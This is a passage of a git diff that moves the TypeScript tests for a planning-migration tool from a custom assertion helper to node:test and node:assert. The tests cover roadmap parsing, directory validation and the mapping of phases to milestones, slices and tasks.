-      assertTrue(
+      assert.deepStrictEqual(result.valid, true, 'no roadmap: validation still passes');
+      assert.ok(
         result.issues.some(i => i.severity === 'warning' && i.file.includes('ROADMAP')),
         'no roadmap: warning issue mentions ROADMAP'
       );
     } finally {
       cleanup(base);
     }
-  }
+});
 
   // ─── Test 13: Validation — missing PROJECT.md → warning ───────────────
-  console.log('\n=== Validation: missing PROJECT.md → warning ===');
-  {
+
+test('Validation: missing PROJECT.md → warning', async () => {
     const base = createFixtureBase();
     try {
       const planning = createPlanningDir(base);
@@ -738,20 +736,13 @@ Another orphan.
 
       const result = await validatePlanningDirectory(planning);
 
-      assertEq(result.valid, true, 'no project: validation passes (warning only)');
-      assertTrue(
+      assert.deepStrictEqual(result.valid, true, 'no project: validation passes (warning only)');
+      assert.ok(
         result.issues.some(i => i.severity === 'warning' && i.file.includes('PROJECT')),
         'no project: warning issue mentions PROJECT'
       );
     } finally {
       cleanup(base);
     }
-  }
-
-  report();
-}
-
-main().catch((error) => {
-  console.error(error);
-  process.exit(1);
 });
+
diff --git a/src/resources/extensions/gsd/tests/migrate-transformer.test.ts b/src/resources/extensions/gsd/tests/migrate-transformer.test.ts
index 618856288..378992772 100644
--- a/src/resources/extensions/gsd/tests/migrate-transformer.test.ts
+++ b/src/resources/extensions/gsd/tests/migrate-transformer.test.ts
@@ -19,9 +19,9 @@ import type {
   GSDSlice,
   GSDTask,
 } from '../migrate/types.ts';
-import { createTestContext } from './test-helpers.ts';
+import { describe, test, beforeEach, afterEach } from 'node:test';
+import assert from 'node:assert/strict';
 
-const { assertEq, assertTrue, report } = createTestContext();
 // ─── Fixture Helpers ───────────────────────────────────────────────────────
 
 function emptyProject(overrides: Partial<PlanningProject> = {}): PlanningProject {
@@ -134,8 +134,7 @@ function makeResearch(fileName: string, content: string): PlanningResearch {
 
 // ─── Scenario 1: Flat Single-Milestone (3 phases → M001 with S01/S02/S03) ──
 
-{
-  console.log('Scenario 1: Flat single-milestone');
+test('Scenario 1: Flat single-milestone', () => {
 
   const project = emptyProject({
     project: '# My Project\nA cool project.',
@@ -159,26 +158,25 @@ function makeResearch(fileName: string, content: string): PlanningResearch {
 
   const result = transformToGSD(project);
 
-  assertEq(result.milestones.length, 1, 'flat: produces 1 milestone');
-  assertTrue(result.milestones[0]?.id === 'M001', 'flat: milestone ID is M001');
-  assertEq(result.milestones[0]?.slices.length, 3, 'flat: 3 slices');
-  assertEq(result.milestones[0]?.slices[0]?.id, 'S01', 'flat: first slice is S01');
-  assertEq(result.milestones[0]?.slices[1]?.id, 'S02', 'flat: second slice is S02');
-  assertEq(result.milestones[0]?.slices[2]?.id, 'S03', 'flat: third slice is S03');
-  assertTrue(result.milestones[0]?.slices[0]?.title.length > 0, 'flat: slice title not empty');
-  assertEq(result.milestones[0]?.slices[0]?.tasks.length, 1, 'flat: S01 has 1 task');
-  assertEq(result.milestones[0]?.slices[1]?.tasks.length, 2, 'flat: S02 has 2 tasks');
-  assertEq(result.milestones[0]?.slices[2]?.tasks.length, 1, 'flat: S03 has 1 task');
-  assertEq(result.milestones[0]?.slices[0]?.tasks[0]?.id, 'T01', 'flat: first task is T01');
-  assertEq(result.milestones[0]?.slices[1]?.tasks[1]?.id, 'T02', 'flat: second task in S02 is T02');
-  assertTrue(result.projectContent.includes('My Project'), 'flat: projectContent preserved');
-  assertEq(result.milestones[0]?.boundaryMap, [], 'flat: boundaryMap defaults to empty');
-}
+  assert.deepStrictEqual(result.milestones.length, 1, 'flat: produces 1 milestone');
+  assert.ok(result.milestones[0]?.id === 'M001', 'flat: milestone ID is M001');
+  assert.deepStrictEqual(result.milestones[0]?.slices.length, 3, 'flat: 3 slices');
+  assert.deepStrictEqual(result.milestones[0]?.slices[0]?.id, 'S01', 'flat: first slice is S01');
+  assert.deepStrictEqual(result.milestones[0]?.slices[1]?.id, 'S02', 'flat: second slice is S02');
+  assert.deepStrictEqual(result.milestones[0]?.slices[2]?.id, 'S03', 'flat: third slice is S03');
+  assert.ok(result.milestones[0]?.slices[0]?.title.length > 0, 'flat: slice title not empty');
+  assert.deepStrictEqual(result.milestones[0]?.slices[0]?.tasks.length, 1, 'flat: S01 has 1 task');
+  assert.deepStrictEqual(result.milestones[0]?.slices[1]?.tasks.length, 2, 'flat: S02 has 2 tasks');
+  assert.deepStrictEqual(result.milestones[0]?.slices[2]?.tasks.length, 1, 'flat: S03 has 1 task');
+  assert.deepStrictEqual(result.milestones[0]?.slices[0]?.tasks[0]?.id, 'T01', 'flat: first task is T01');
+  assert.deepStrictEqual(result.milestones[0]?.slices[1]?.tasks[1]?.id, 'T02', 'flat: second task in S02 is T02');
+  assert.ok(result.projectContent.includes('My Project'), 'flat: projectContent preserved');
+  assert.deepStrictEqual(result.milestones[0]?.boundaryMap, [], 'flat: boundaryMap defaults to empty');
+});
 
 // ─── Scenario 2: Multi-Milestone (2 milestones with independent numbering) ──
 
-{
-  console.log('Scenario 2: Multi-milestone');
+test('Scenario 2: Multi-milestone', () => {
 
   const project = emptyProject({
     roadmap: milestoneRoadmap([
@@ -206,23 +204,22 @@ function makeResearch(fileName: string, content: string): PlanningResearch {
 
   const result = transformToGSD(project);
 
-  assertEq(result.milestones.length, 2, 'multi: 2 milestones');
-  assertEq(result.milestones[0]?.id, 'M001', 'multi: first milestone M001');
-  assertEq(result.milestones[1]?.id, 'M002', 'multi: second milestone M002');
-  assertEq(result.milestones[0]?.slices.length, 2, 'multi: M001 has 2 slices');
-  assertEq(result.milestones[1]?.slices.length, 3, 'multi: M002 has 3 slices');
+  assert.deepStrictEqual(result.milestones.length, 2, 'multi: 2 milestones');
+  assert.deepStrictEqual(result.milestones[0]?.id, 'M001', 'multi: first milestone M001');
+  assert.deepStrictEqual(result.milestones[1]?.id, 'M002', 'multi: second milestone M002');
+  assert.deepStrictEqual(result.milestones[0]?.slices.length, 2, 'multi: M001 has 2 slices');
+  assert.deepStrictEqual(result.milestones[1]?.slices.length, 3, 'multi: M002 has 3 slices');
   // Independent numbering: both start at S01
-  assertEq(result.milestones[0]?.slices[0]?.id, 'S01', 'multi: M001 starts at S01');
-  assertEq(result.milestones[1]?.slices[0]?.id, 'S01', 'multi: M002 starts at S01');
-  assertEq(result.milestones[1]?.slices[2]?.id, 'S03', 'multi: M002 third slice is S03');
-  assertTrue(result.milestones[0]?.title.length > 0, 'multi: M001 has title');
-  assertTrue(result.milestones[1]?.title.length > 0, 'multi: M002 has title');
-}
+  assert.deepStrictEqual(result.milestones[0]?.slices[0]?.id, 'S01', 'multi: M001 starts at S01');
+  assert.deepStrictEqual(result.milestones[1]?.slices[0]?.id, 'S01', 'multi: M002 starts at S01');
+  assert.deepStrictEqual(result.milestones[1]?.slices[2]?.id, 'S03', 'multi: M002 third slice is S03');
+  assert.ok(result.milestones[0]?.title.length > 0, 'multi: M001 has title');
+  assert.ok(result.milestones[1]?.title.length > 0, 'multi: M002 has title');
+});
 
 // ─── Scenario 3: Decimal Phase Ordering (1, 2, 2.1, 2.2, 3 → S01–S05) ──
 
-{
-  console.log('Scenario 3: Decimal phase ordering');
+test('Scenario 3: Decimal phase ordering', () => {
 
   const project = emptyProject({
     roadmap: flatRoadmap([
@@ -243,27 +240,26 @@ function makeResearch(fileName: string, content: string): PlanningResearch {
 
   const result = transformToGSD(project);
 
-  assertEq(result.milestones[0]?.slices.length, 5, 'decimal: 5 slices total');
-  assertEq(result.milestones[0]?.slices[0]?.id, 'S01', 'decimal: first is S01');
-  assertEq(result.milestones[0]?.slices[1]?.id, 'S02', 'decimal: second is S02');
-  assertEq(result.milestones[0]?.slices[2]?.id, 'S03', 'decimal: third is S03');
-  assertEq(result.milestones[0]?.slices[3]?.id, 'S04', 'decimal: fourth is S04');
-  assertEq(result.milestones[0]?.slices[4]?.id, 'S05', 'decimal: fifth is S05');
+  assert.deepStrictEqual(result.milestones[0]?.slices.length, 5, 'decimal: 5 slices total');
+  assert.deepStrictEqual(result.milestones[0]?.slices[0]?.id, 'S01', 'decimal: first is S01');
+  assert.deepStrictEqual(result.milestones[0]?.slices[1]?.id, 'S02', 'decimal: second is S02');
+  assert.deepStrictEqual(result.milestones[0]?.slices[2]?.id, 'S03', 'decimal: third is S03');
+  assert.deepStrictEqual(result.milestones[0]?.slices[3]?.id, 'S04', 'decimal: fourth is S04');
+  assert.deepStrictEqual(result.milestones[0]?.slices[4]?.id, 'S05', 'decimal: fifth is S05');
   // Order must be by float value: 1, 2, 2.1, 2.2, 3
-  assertTrue(
+  assert.ok(
     result.milestones[0]?.slices[0]?.title.toLowerCase().includes('foundation'),
     'decimal: S01 is foundation (phase 1)',
   );
-  assertTrue(
+  assert.ok(
     result.milestones[0]?.slices[4]?.title.toLowerCase().includes('finalize'),
     'decimal: S05 is finalize (phase 3)',
   );
-}
+});
 
 // ─── Scenario 4: Completion State ──────────────────────────────────────────
 
-{
-  console.log('Scenario 4: Completion state mapping');
+test('Scenario 4: Completion state mapping', () => {
 
   const project = emptyProject({
     roadmap: flatRoadmap([
@@ -288,26 +284,25 @@ function makeResearch(fileName: string, content: string): PlanningResearch {
   const doneSlice = result.milestones[0]?.slices[0];
   const activeSlice = result.milestones[0]?.slices[1];
 
-  assertTrue(doneSlice?.done === true, 'completion: done phase → done slice');
-  assertTrue(activeSlice?.done === false, 'completion: active phase → not-done slice');
-  assertTrue(doneSlice?.tasks[0]?.done === true, 'completion: plan with summary → done task');
-  assertTrue(doneSlice?.tasks[1]?.done === false, 'completion: plan without summary → not-done task');
-  assertTrue(doneSlice?.tasks[0]?.summary !== null, 'completion: done task has summary data');
-  assertTrue(doneSlice?.tasks[1]?.summary === null, 'completion: not-done task has null summary');
-  assertEq(doneSlice?.tasks[0]?.summary?.completedAt, '2026-01-15', 'completion: summary completedAt from frontmatter');
-  assertEq(doneSlice?.tasks[0]?.summary?.duration, '2h', 'completion: summary duration from frontmatter');
-  assertEq(doneSlice?.tasks[0]?.summary?.provides, ['feature-01'], 'completion: summary provides from frontmatter');
-  assertEq(doneSlice?.tasks[0]?.summary?.keyFiles, ['file-01.ts'], 'completion: summary keyFiles from frontmatter');
-  assertTrue(doneSlice?.tasks[0]?.summary?.whatHappened?.includes('Summary body') ?? false, 'completion: summary whatHappened from body');
-  assertTrue(doneSlice?.summary !== null, 'completion: done slice has slice summary');
-  assertTrue(activeSlice?.summary === null, 'completion: active slice has null summary');
-  assertEq(doneSlice?.tasks[0]?.estimate, '2h', 'completion: task estimate from summary duration');
-}
+  assert.ok(doneSlice?.done === true, 'completion: done phase → done slice');
+  assert.ok(activeSlice?.done === false, 'completion: active phase → not-done slice');
+  assert.ok(doneSlice?.tasks[0]?.done === true, 'completion: plan with summary → done task');
+  assert.ok(doneSlice?.tasks[1]?.done === false, 'completion: plan without summary → not-done task');
+  assert.ok(doneSlice?.tasks[0]?.summary !== null, 'completion: done task has summary data');
+  assert.ok(doneSlice?.tasks[1]?.summary === null, 'completion: not-done task has null summary');
+  assert.deepStrictEqual(doneSlice?.tasks[0]?.summary?.completedAt, '2026-01-15', 'completion: summary completedAt from frontmatter');
+  assert.deepStrictEqual(doneSlice?.tasks[0]?.summary?.duration, '2h', 'completion: summary duration from frontmatter');
+  assert.deepStrictEqual(doneSlice?.tasks[0]?.summary?.provides, ['feature-01'], 'completion: summary provides from frontmatter');
+  assert.deepStrictEqual(doneSlice?.tasks[0]?.summary?.keyFiles, ['file-01.ts'], 'completion: summary keyFiles from frontmatter');
+  assert.ok(doneSlice?.tasks[0]?.summary?.whatHappened?.includes('Summary body') ?? false, 'completion: summary whatHappened from body');
+  assert.ok(doneSlice?.summary !== null, 'completion: done slice has slice summary');
+  assert.ok(activeSlice?.summary === null, 'completion: active slice has null summary');
+  assert.deepStrictEqual(doneSlice?.tasks[0]?.estimate, '2h', 'completion: task estimate from summary duration');
+});
 
 // ─── Scenario 5: Research Consolidation ────────────────────────────────────
 
-{
-  console.log('Scenario 5: Research consolidation');
+test('Scenario 5: Research consolidation', () => {
 
   const project = emptyProject({
     roadmap: flatRoadmap([roadmapEntry(1, 'researched-phase')]),
@@ -328,28 +323,27 @@ function makeResearch(fileName: string, content: string): PlanningResearch {
   const result = transformToGSD(project);
 
   // Project-level research → milestone research
-  assertTrue(result.milestones[0]?.research !== null, 'research: milestone has consolidated research');
-  assertTrue(result.milestones[0]?.research!.includes('Project Summary'), 'research: includes SUMMARY content');
-  assertTrue(result.milestones[0]?.research!.includes('Architecture'), 'research: includes ARCHITECTURE content');
-  assertTrue(result.milestones[0]?.research!.includes('Pitfalls'), 'research: includes PITFALLS content');
+  assert.ok(result.milestones[0]?.research !== null, 'research: milestone has consolidated research');
+  assert.ok(result.milestones[0]?.research!.includes('Project Summary'), 'research: includes SUMMARY content');
+  assert.ok(result.milestones[0]?.research!.includes('Architecture'), 'research: includes ARCHITECTURE content');
+  assert.ok(result.milestones[0]?.research!.includes('Pitfalls'), 'research: includes PITFALLS content');
 
   // Fixed ordering: SUMMARY before ARCHITECTURE before PITFALLS
   const summaryIdx = result.milestones[0]?.research!.indexOf('Project Summary') ?? -1;
   const archIdx = result.milestones[0]?.research!.indexOf('Architecture') ?? -1;
   const pitfallIdx = result.milestones[0]?.research!.indexOf('Pitfalls') ?? -1;
-  assertTrue(summaryIdx < archIdx, 'research: SUMMARY before ARCHITECTURE in consolidated');
-  assertTrue(archIdx < pitfallIdx, 'research: ARCHITECTURE before PITFALLS in consolidated');
+  assert.ok(summaryIdx < archIdx, 'research: SUMMARY before ARCHITECTURE in consolidated');
+  assert.ok(archIdx < pitfallIdx, 'research: ARCHITECTURE before PITFALLS in consolidated');
 
   // Phase-level research → slice research
   const slice = result.milestones[0]?.slices[0];
-  assertTrue(slice?.research !== null, 'research: slice has phase research');
-  assertTrue(slice?.research!.includes('Phase Features'), 'research: slice research includes phase content');
-}
+  assert.ok(slice?.research !== null, 'research: slice has phase research');
+  assert.ok(slice?.research!.includes('Phase Features'), 'research: slice research includes phase content');
+});
 
 // ─── Scenario 6: Requirements Classification ──────────────────────────────
 
-{
-  console.log('Scenario 6: Requirements classification');
+test('Scenario 6: Requirements classification', () => {
 
   const project = emptyProject({
     roadmap: flatRoadmap([roadmapEntry(1, 'req-phase')]),
@@ -365,22 +359,21 @@ function makeResearch(fileName: string, content: string): PlanningResearch {
 
   const result = transformToGSD(project);
 
-  assertEq(result.requirements.length, 3, 'requirements: 3 requirements');
-  assertEq(result.requirements[0]?.id, 'R001', 'requirements: first is R001');
-  assertEq(result.requirements[0]?.status, 'active', 'requirements: R001 status active');
-  assertEq(result.requirements[1]?.status, 'validated', 'requirements: R002 status validated');
-  assertEq(result.requirements[2]?.status, 'deferred', 'requirements: R003 status deferred');
-  assertTrue(result.requirements[0]?.title === 'Core Feature', 'requirements: R001 title preserved');
-  assertTrue(result.requirements[0]?.description.includes('Description for R001'), 'requirements: R001 description preserved');
-  assertEq(result.requirements[0]?.class, 'core-capability', 'requirements: default class');
-  assertEq(result.requirements[0]?.source, 'inferred', 'requirements: default source');
-  assertEq(result.requirements[0]?.primarySlice, 'none yet', 'requirements: default primarySlice');
-}
+  assert.deepStrictEqual(result.requirements.length, 3, 'requirements: 3 requirements');
+  assert.deepStrictEqual(result.requirements[0]?.id, 'R001', 'requirements: first is R001');
+  assert.deepStrictEqual(result.requirements[0]?.status, 'active', 'requirements: R001 status active');
+  assert.deepStrictEqual(result.requirements[1]?.status, 'validated', 'requirements: R002 status validated');
+  assert.deepStrictEqual(result.requirements[2]?.status, 'deferred', 'requirements: R003 status deferred');
+  assert.ok(result.requirements[0]?.title === 'Core Feature', 'requirements: R001 title preserved');
+  assert.ok(result.requirements[0]?.description.includes('Description for R001'), 'requirements: R001 description preserved');
+  assert.deepStrictEqual(result.requirements[0]?.class, 'core-capability', 'requirements: default class');
+  assert.deepStrictEqual(result.requirements[0]?.source, 'inferred', 'requirements: default source');
+  assert.deepStrictEqual(result.requirements[0]?.primarySlice, 'none yet', 'requirements: default primarySlice');
+});
 
 // ─── Scenario 7: Empty Phase (no plans → slice with 0 tasks) ───────────────
 
-{
-  console.log('Scenario 7: Empty phase');
+test('Scenario 7: Empty phase', () => {
 
   const project = emptyProject({
     roadmap: flatRoadmap([
@@ -397,15 +390,14 @@ function makeResearch(fileName: string, content: string): PlanningResearch {
 
   const result = transformToGSD(project);
 
-  assertEq(result.milestones[0]?.slices[0]?.tasks.length, 0, 'empty: empty phase → 0 tasks');
-  assertEq(result.milestones[0]?.slices[1]?.tasks.length, 1, 'empty: non-empty phase → 1 task');
-  assertTrue(result.milestones[0]?.slices[0]?.id === 'S01', 'empty: empty slice still gets ID');
-}
+  assert.deepStrictEqual(result.milestones[0]?.slices[0]?.tasks.length, 0, 'empty: empty phase → 0 tasks');
+  assert.deepStrictEqual(result.milestones[0]?.slices[1]?.tasks.length, 1, 'empty: non-empty phase → 1 task');
+  assert.ok(result.milestones[0]?.slices[0]?.id === 'S01', 'empty: empty slice still gets ID');
+});
 
 // ─── Scenario 8: Demo Derivation from Plan Objective ───────────────────────
 
-{
-  console.log('Scenario 8: Demo derivation');
+test('Scenario 8: Demo derivation', () => {
 
   const project = emptyProject({
     roadmap: flatRoadmap([roadmapEntry(1, 'demo-phase')]),
@@ -420,19 +412,18 @@ function makeResearch(fileName: string, content: string): PlanningResearch {
 
   const result = transformToGSD(project);
 
-  assertTrue(result.milestones[0]?.slices[0]?.demo.length > 0, 'demo: slice demo is not empty');
-  assertTrue(
+  assert.ok(result.milestones[0]?.slices[0]?.demo.length > 0, 'demo: slice demo is not empty');
+  assert.ok(
     result.milestones[0]?.slices[0]?.demo.includes('authentication') ||
     result.milestones[0]?.slices[0]?.demo.includes('Build'),
     'demo: slice demo derived from first plan objective',
   );
-  assertTrue(result.milestones[0]?.slices[0]?.goal.length > 0, 'demo: slice goal is not empty');
-}
+  assert.ok(result.milestones[0]?.slices[0]?.goal.length > 0, 'demo: slice goal is not empty');
+});
 
 // ─── Scenario 9: Field Defaults and Type Safety ────────────────────────────
 
-{
-  console.log('Scenario 9: Field defaults');
+test('Scenario 9: Field defaults', () => {
 
   const project = emptyProject({
     roadmap: flatRoadmap([roadmapEntry(1, 'defaults-phase')]),
@@ -460,20 +451,19 @@ function makeResearch(fileName: string, content: string): PlanningResearch {
   const slice = result.milestones[0]?.slices[0];
   const task = slice?.tasks[0];
 
-  assertEq(slice?.risk, 'medium', 'defaults: slice risk defaults to medium');
-  assertEq(slice?.depends, [], 'defaults: S01 has no depends');
-  assertTrue(task?.description.length > 0, 'defaults: task description not empty');
-  assertEq(task?.files, ['src/auth.ts', 'src/db.ts'], 'defaults: task files from frontmatter');
-  assertEq(task?.mustHaves, ['Auth works', 'DB connected'], 'defaults: task mustHaves from frontmatter');
-  assertEq(task?.done, false, 'defaults: task without summary is not done');
-  assertEq(task?.estimate, '', 'defaults: task without summary has empty estimate');
-  assertTrue(task?.summary === null, 'defaults: task without summary has null summary');
-}
+  assert.deepStrictEqual(slice?.risk, 'medium', 'defaults: slice risk defaults to medium');
+  assert.deepStrictEqual(slice?.depends, [], 'defaults: S01 has no depends');
+  assert.ok(task?.description.length > 0, 'defaults: task description not empty');
+  assert.deepStrictEqual(task?.files, ['src/auth.ts', 'src/db.ts'], 'defaults: task files from frontmatter');
+  assert.deepStrictEqual(task?.mustHaves, ['Auth works', 'DB connected'], 'defaults: task mustHaves from frontmatter');
+  assert.deepStrictEqual(task?.done, false, 'defaults: task without summary is not done');
+  assert.deepStrictEqual(task?.estimate, '', 'defaults: task without summary has empty estimate');
+  assert.ok(task?.summary === null, 'defaults: task without summary has null summary');
+});
 
 // ─── Scenario 10: Sequential Depends ──────────────────────────────────────
 
-{
-  console.log('Scenario 10: Sequential depends');
+test('Scenario 10: Sequential depends', () => {
 
   const project = emptyProject({
     roadmap: flatRoadmap([
@@ -491,15 +481,14 @@ function makeResearch(fileName: string, content: string): PlanningResearch {
   const result = transformToGSD(project);
   const slices = result.milestones[0]?.slices;
 
-  assertEq(slices?.[0]?.depends, [], 'depends: S01 has empty depends');
-  assertEq(slices?.[1]?.depends, ['S01'], 'depends: S02 depends on S01');
-  assertEq(slices?.[2]?.depends, ['S02'], 'depends: S03 depends on S02');
-}
+  assert.deepStrictEqual(slices?.[0]?.depends, [], 'depends: S01 has empty depends');
+  assert.deepStrictEqual(slices?.[1]?.depends, ['S01'], 'depends: S02 depends on S01');
+  assert.deepStrictEqual(slices?.[2]?.depends, ['S02'], 'depends: S03 depends on S02');
+});
 
 // ─── Scenario 11: Requirements with unknown status and missing IDs ─────────
 
-{
-  console.log('Scenario 11: Requirements edge cases');
+test('Scenario 11: Requirements edge cases', () => {
 
   const project = emptyProject({
     roadmap: flatRoadmap([roadmapEntry(1, 'req-edge')]),
@@ -516,17 +505,16 @@ function makeResearch(fileName: string, content: string): PlanningResearch {
 
   const result = transformToGSD(project);
 
-  assertEq(result.requirements[0]?.id, 'R001', 'req-edge: empty id gets R001');
-  assertEq(result.requirements[1]?.id, 'R002', 'req-edge: second empty id gets R002');
-  assertEq(result.requirements[2]?.id, 'R005', 'req-edge: existing id preserved');
-  assertEq(result.requirements[2]?.status, 'active', 'req-edge: unknown status normalized to active');
-  assertEq(result.requirements[3]?.status, 'deferred', 'req-edge: uppercase DEFERRED normalized');
-}
+  assert.deepStrictEqual(result.requirements[0]?.id, 'R001', 'req-edge: empty id gets R001');
+  assert.deepStrictEqual(result.requirements[1]?.id, 'R002', 'req-edge: second empty id gets R002');
+  assert.deepStrictEqual(result.requirements[2]?.id, 'R005', 'req-edge: existing id preserved');
+  assert.deepStrictEqual(result.requirements[2]?.status, 'active', 'req-edge: unknown status normalized to active');
+  assert.deepStrictEqual(result.requirements[3]?.status, 'deferred', 'req-edge: uppercase DEFERRED normalized');
+});
 
 // ─── Scenario 12: Vision derivation ────────────────────────────────────────
 
-{
-  console.log('Scenario 12: Vision derivation');
+test('Scenario 12: Vision derivation', () => {
 
   // Vision from project description
   const project1 = emptyProject({
@@ -536,7 +524,7 @@ function makeResearch(fileName: string, content: string): PlanningResearch {
   });
 
   const result1 = transformToGSD(project1);
-  assertTrue(result1.milestones[0]?.vision.includes('revolutionary'), 'vision: derived from project first line');
+  assert.ok(result1.milestones[0]?.vision.includes('revolutionary'), 'vision: derived from project first line');
 
   // Vision fallback when no project
   const project2 = emptyProject({
@@ -545,13 +533,12 @@ function makeResearch(fileName: string, content: string): PlanningResearch {
   });
 
   const result2 = transformToGSD(project2);
-  assertTrue(result2.milestones[0]?.vision.length > 0, 'vision: fallback is non-empty');
-}
+  assert.ok(result2.milestones[0]?.vision.length > 0, 'vision: fallback is non-empty');
+});
 
 // ─── Scenario 13: Decisions content from summaries ─────────────────────────
 
-{
-  console.log('Scenario 13: Decisions content');
+test('Scenario 13: Decisions content', () => {
 
   const project = emptyProject({
     roadmap: flatRoadmap([roadmapEntry(1, 'decision-phase', true)]),
@@ -565,13 +552,12 @@ function makeResearch(fileName: string, content: string): PlanningResearch {
 
   const result = transformToGSD(project);
 
-  assertTrue(result.decisionsContent.includes('decision-01'), 'decisions: extracts key-decisions from summaries');
-}
+  assert.ok(result.decisionsContent.includes('decision-01'), 'decisions: extracts key-decisions from summaries');
+});
 
 // ─── Scenario 14: No undefined values in output ───────────────────────────
 
-{
-  console.log('Scenario 14: No undefined values');
+test('Scenario 14: No undefined values', () => {
 
   const project = emptyProject({
     project: '# Test\nDescription.',
@@ -596,7 +582,7 @@ function makeResearch(fileName: string, content: string): PlanningResearch {
   // Deep check for undefined values
   function checkNoUndefined(obj: unknown, path: string): void {
     if (obj === undefined) {
-      assertTrue(false, `no-undefined: ${path} is undefined`);
+      assert.ok(false, `no-undefined: ${path} is undefined`);
       return;
     }
     if (obj === null) return; // null is allowed (e.g. research, summary)
@@ -612,13 +598,12 @@ function makeResearch(fileName: string, content: string): PlanningResearch {
   }
 
   checkNoUndefined(result, 'result');
-  assertTrue(true, 'no-undefined: deep check completed without finding undefined values');
-}
+  assert.ok(true, 'no-undefined: deep check completed without finding undefined values');
+});
 
 // ─── Scenario 15: Research with no files ───────────────────────────────────
 
-{
-  console.log('Scenario 15: Empty research');
+test('Scenario 15: Empty research', () => {
 
   const project = emptyProject({
     roadmap: flatRoadmap([roadmapEntry(1, 'no-research')]),
@@ -626,10 +611,9 @@ function makeResearch(fileName: string, content: string): PlanningResearch {
   });
 
   const result = transformToGSD(project);
-  assertTrue(result.milestones[0]?.research === null, 'empty-research: milestone research is null');
-  assertTrue(result.milestones[0]?.slices[0]?.research === null, 'empty-research: slice research is null');
-}
+  assert.ok(result.milestones[0]?.research === null, 'empty-research: milestone research is null');
+  assert.ok(result.milestones[0]?.slices[0]?.research === null, 'empty-research: slice research is null');
+});
 
 // ─── Results ───────────────────────────────────────────────────────────────
 
-report();
diff --git a/src/resources/extensions/gsd/tests/migrate-validator-parsers.test.ts b/src/resources/extensions/gsd/tests/migrate-validator-parsers.test.ts
index 65052d46c..2466b9480 100644
--- a/src/resources/extensions/gsd/tests/migrate-validator-parsers.test.ts
+++ b/src/resources/extensions/gsd/tests/migrate-validator-parsers.test.ts
@@ -15,9 +15,9 @@ import {
   parseOldState,
   parseOldConfig,
 } from '../migrate/parsers.ts';
-import { createTestContext } from './test-helpers.ts';
+import { describe, test, beforeEach, afterEach } from 'node:test';
+import assert from 'node:assert/strict';
 
-const { assertEq, assertTrue, report } = createTestContext();
 function createFixtureBase(): string {
   return mkdtempSync(join(tmpdir(), 'gsd-migrate-t02-'));
 }
@@ -173,55 +173,49 @@ const SAMPLE_STATE = `# State
 **Status:** in-progress
 `;
 
-async function main(): Promise<void> {
-
   // ═══════════════════════════════════════════════════════════════════════
   // Validator Tests
   // ═══════════════════════════════════════════════════════════════════════
 
-  console.log('\n=== Validator: missing directory → fatal ===');
-  {
+test('Validator: missing directory → fatal', async () => {
     const base = createFixtureBase();
     try {
       const result = await validatePlanningDirectory(join(base, 'nonexistent'));
-      assertEq(result.valid, false, 'missing dir: validation fails');
-      assertTrue(result.issues.length > 0, 'missing dir: has issues');
-      assertTrue(result.issues.some(i => i.severity === 'fatal'), 'missing dir: has fatal issue');
+      assert.deepStrictEqual(result.valid, false, 'missing dir: validation fails');
+      assert.ok(result.issues.length > 0, 'missing dir: has issues');
+      assert.ok(result.issues.some(i => i.severity === 'fatal'), 'missing dir: has fatal issue');
     } finally {
       cleanup(base);
     }
-  }
+});
 
-  console.log('\n=== Validator: missing ROADMAP.md → warning (not fatal) ===');
-  {
+test('Validator: missing ROADMAP.md → warning (not fatal)', async () => {
     const base = createFixtureBase();
     try {
       const planning = createPlanningDir(base);
       writeFileSync(join(planning, 'PROJECT.md'), SAMPLE_PROJECT);
       const result = await validatePlanningDirectory(planning);
-      assertEq(result.valid, true, 'no roadmap: validation still passes');
-      assertTrue(result.issues.some(i => i.severity === 'warning' && i.file.includes('ROADMAP')), 'no roadmap: warning issue mentions ROADMAP');
+      assert.deepStrictEqual(result.valid, true, 'no roadmap: validation still passes');
+      assert.ok(result.issues.some(i => i.severity === 'warning' && i.file.includes('ROADMAP')), 'no roadmap: warning issue mentions ROADMAP');
     } finally {
       cleanup(base);
     }
-  }
+});
 
-  console.log('\n=== Validator: missing PROJECT.md → warning ===');
-  {
+test('Validator: missing PROJECT.md → warning', async () => {
     const base = createFixtureBase();
     try {
       const planning = createPlanningDir(base);
       writeFileSync(join(planning, 'ROADMAP.md'), SAMPLE_ROADMAP);
       const result = await validatePlanningDirectory(planning);
-      assertEq(result.valid, true, 'no project: validation passes (warning only)');
-      assertTrue(result.issues.some(i => i.severity === 'warning' && i.file.includes('PROJECT')), 'no project: warning issue mentions PROJECT');
+      assert.deepStrictEqual(result.valid, true, 'no project: validation passes (warning only)');
+      assert.ok(result.issues.some(i => i.severity === 'warning' && i.file.includes('PROJECT')), 'no project: warning issue mentions PROJECT');
     } finally {
       cleanup(base);
     }
-  }
+});
 
-  console.log('\n=== Validator: complete directory → valid with no issues ===');
-  {
+test('Validator: complete directory → valid with no issues', async () => {
     const base = createFixtureBase();
     try {
       const planning = createPlanningDir(base);
@@ -231,78 +225,74 @@ async function main(): Promise<void> {
       writeFileSync(join(planning, 'STATE.md'), SAMPLE_STATE);
       mkdirSync(join(planning, 'phases'), { recursive: true });
       const result = await validatePlanningDirectory(planning);
-      assertEq(result.valid, true, 'complete dir: validation passes');
-      assertEq(result.issues.length, 0, 'complete dir: no issues');
+      assert.deepStrictEqual(result.valid, true, 'complete dir: validation passes');
+      assert.deepStrictEqual(result.issues.length, 0, 'complete dir: no issues');
     } finally {
       cleanup(base);
     }
-  }
+});
 
   // ═══════════════════════════════════════════════════════════════════════
   // Roadmap Parser Tests
   // ═══════════════════════════════════════════════════════════════════════
 
-  console.log('\n=== parseOldRoadmap: flat format ===');
-  {
+test('parseOldRoadmap: flat format', () => {
     const roadmap = parseOldRoadmap(SAMPLE_ROADMAP);
-    assertEq(roadmap.milestones.length, 0, 'flat roadmap: no milestone sections');
-    assertEq(roadmap.phases.length, 3, 'flat roadmap: 3 phases');
-    assertEq(roadmap.phases[0].number, 29, 'flat roadmap: first phase number');
-    assertEq(roadmap.phases[0].title, 'Auth System', 'flat roadmap: first phase title');
-    assertEq(roadmap.phases[0].done, true, 'flat roadmap: first phase done');
-    assertEq(roadmap.phases[1].done, false, 'flat roadmap: second phase not done');
-  }
+    assert.deepStrictEqual(roadmap.milestones.length, 0, 'flat roadmap: no milestone sections');
+    assert.deepStrictEqual(roadmap.phases.length, 3, 'flat roadmap: 3 phases');
+    assert.deepStrictEqual(roadmap.phases[0].number, 29, 'flat roadmap: first phase number');
+    assert.deepStrictEqual(roadmap.phases[0].title, 'Auth System', 'flat roadmap: first phase title');
